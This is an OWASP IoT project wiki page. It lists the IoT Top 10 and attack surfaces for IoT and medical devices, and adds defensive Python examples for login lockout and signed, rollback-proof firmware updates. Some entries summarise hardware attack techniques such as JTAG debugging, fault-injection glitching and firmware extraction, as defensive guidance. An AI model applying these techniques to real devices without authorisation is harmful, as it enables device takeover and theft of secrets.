| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's Slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
Use of easily brute-forced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grant unauthorized access to deployed systems. <br />
* I2 Insecure Network Services<br />
Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control.<br />
* I3 Insecure Ecosystem Interfaces<br />
Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allow compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.<br />
* I4 Lack of Secure Update Mechanism<br />
Lack of ability to securely update the device or ecosystem. This includes lack of firmware validation on the device, lack of secure delivery (unencrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.<br />
* I5 Use of Insecure or Outdated Components<br />
Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating systems and the use of third-party software or hardware components from a compromised supply chain.<br />
* I6 Insufficient Privacy Protection<br />
Users' personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.<br />
* I7 Insecure Data Transfer and Storage<br />
Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.<br />
* I8 Lack of Device Management<br />
Lack of security support on existing devices deployed in production, including asset management, update management, and secure decommissioning.<br />
* I9 Insecure Default Settings<br />
Devices or systems that are shipped with insecure default settings or lack the capability to make the system more secure.<br />
* I10 Lack of Physical Hardening<br />
Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is misconfigured or not kept current, e.g. the service still accepts SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Desoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a great deal of useful information: the binaries (and sometimes the source code) of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Fault injection (glitching) and side-channel analysis]<br />
|<br />
* With a JTAG adapter and gdb, the firmware's execution on the device can be altered and almost all software-based security controls bypassed.<br />
* Fault injection such as voltage or clock glitching can also alter the execution flow, and side-channel analysis can be used to leak interesting information (keys, secrets) from the device.<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* Connecting to a serial interface usually yields full console access to the device<br />
* Common countermeasures include custom bootloaders that keep an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH servers, web servers, etc.<br />
|-<br />
<br />
|}<br />
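Added example for the first three rows of the table (Username Enumeration, Weak Passwords, Account Lockout); it is not the project's own code. The login handler returns one generic failure for unknown users, locked accounts and wrong passwords alike, spends the same hashing cost on an unknown username so response time does not reveal whether a name exists, refuses the trivial and default passwords named above at enrolment, and locks an account after MAX_FAILURES consecutive failures. The account store, the PBKDF2 parameters, the thresholds and the banned-password list are assumptions.<br />

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Optional

# Constructed deny-list: defaults and trivial choices a device must refuse.
BANNED_PASSWORDS = {"", "1234", "12345", "123456", "password", "admin", "root"}
MIN_PASSWORD_LEN = 12      # assumption; align with the deployment's policy
MAX_FAILURES = 5           # lock after this many consecutive failures
LOCKOUT_SECONDS = 300      # assumption; length of the lock
PBKDF2_ROUNDS = 100_000    # a trade-off on a constrained CPU, but never single digits

GENERIC_FAILURE = "invalid credentials"   # the only failure text ever returned


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def password_ok(password: str) -> bool:
    """Policy applied at enrolment and on every change, so '1234' never lands in the store."""
    return len(password) >= MIN_PASSWORD_LEN and password.lower() not in BANNED_PASSWORDS


class AccountStore:
    def __init__(self) -> None:
        self._accounts = {}   # username -> {salt, hash, failures, locked_until}
        # Dummy credential hashed for unknown usernames so a miss costs the same
        # time as a hit; otherwise response time enumerates valid names.
        self._dummy_salt = os.urandom(16)
        self._dummy_hash = _hash_password(secrets.token_hex(16), self._dummy_salt)

    def create(self, username: str, password: str) -> None:
        if not password_ok(password):
            raise ValueError("password violates policy")
        salt = os.urandom(16)
        self._accounts[username] = {"salt": salt, "hash": _hash_password(password, salt),
                                    "failures": 0, "locked_until": 0.0}

    def login(self, username: str, password: str, now: Optional[float] = None) -> str:
        """Return 'ok' or GENERIC_FAILURE; which check failed is never disclosed."""
        now = time.time() if now is None else now
        acct = self._accounts.get(username)
        if acct is None:
            # Burn the same PBKDF2 cost as a real account, then fail generically.
            hmac.compare_digest(_hash_password(password, self._dummy_salt), self._dummy_hash)
            return GENERIC_FAILURE
        if now < acct["locked_until"]:
            return GENERIC_FAILURE          # locked: same text, no hint that the name is valid
        if hmac.compare_digest(_hash_password(password, acct["salt"]), acct["hash"]):
            acct["failures"] = 0
            return "ok"
        acct["failures"] += 1
        if acct["failures"] >= MAX_FAILURES:
            acct["locked_until"] = now + LOCKOUT_SECONDS
            acct["failures"] = 0
        return GENERIC_FAILURE
```

A per-account lock is itself a denial-of-service lever (anyone who knows the admin username can keep it locked), so pair it with per-source throttling and log every lockout as an event rather than relying on the lock alone.<br />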
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key, including across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
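Added example for the Update Mechanism row (updates not signed, update verification, update authentication, malicious update, update location writable); it is not the project's own code. The verifier authenticates the whole image before parsing a single header field, refuses version rollback, and refuses a world-writable staging directory. The image layout, key and version numbers are constructed. A keyed MAC (HMAC-SHA256) stands in for a signature only because the Python standard library has no Ed25519/ECDSA: a shipped device must verify with a public key, since a symmetric key recoverable from any one unit would let an attacker sign updates for all of them.<br />

```python
import hashlib
import hmac
import os
import stat
import struct
import tempfile
from typing import Tuple

MAGIC = b"FWUP"                     # constructed image format
HEADER = struct.Struct("!4sI")      # magic, version (big-endian uint32)
TAG_LEN = hashlib.sha256().digest_size


def package_update(key: bytes, version: int, payload: bytes) -> bytes:
    """Build-side helper: header || payload || MAC(header || payload)."""
    body = HEADER.pack(MAGIC, version) + payload
    return body + hmac.new(key, body, hashlib.sha256).digest()


def staging_dir_ok(path: str) -> bool:
    """A world-writable staging directory lets any local process swap the image
    between download and verification; refuse it outright."""
    mode = os.stat(path).st_mode
    return stat.S_ISDIR(mode) and not (mode & stat.S_IWOTH)


def verify_update(key: bytes, blob: bytes, installed_version: int) -> Tuple[bool, str]:
    """Return (accepted, reason). Nothing is written until every check passes."""
    if len(blob) < HEADER.size + TAG_LEN:
        return False, "truncated"
    body, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    # Authenticate before parsing: unauthenticated bytes never reach the header parser.
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        return False, "bad mac"
    magic, version = HEADER.unpack_from(body)
    if magic != MAGIC:
        return False, "bad magic"
    if version <= installed_version:
        return False, "downgrade or replay"     # anti-rollback
    return True, "ok"


def staging_demo() -> Tuple[bool, bool]:
    """Constructed demo: a 0755 staging directory passes, a 0777 one is refused."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o755)
    safe = staging_dir_ok(d)
    os.chmod(d, 0o777)
    unsafe = staging_dir_ok(d)
    os.rmdir(d)
    return safe, unsafe
```

The downgrade check is what turns a signed-but-old image from a valid update into a rejected one; without it an attacker replays a legitimately signed vulnerable release, which is the "malicious update" that needs no forged signature at all.<br />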
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
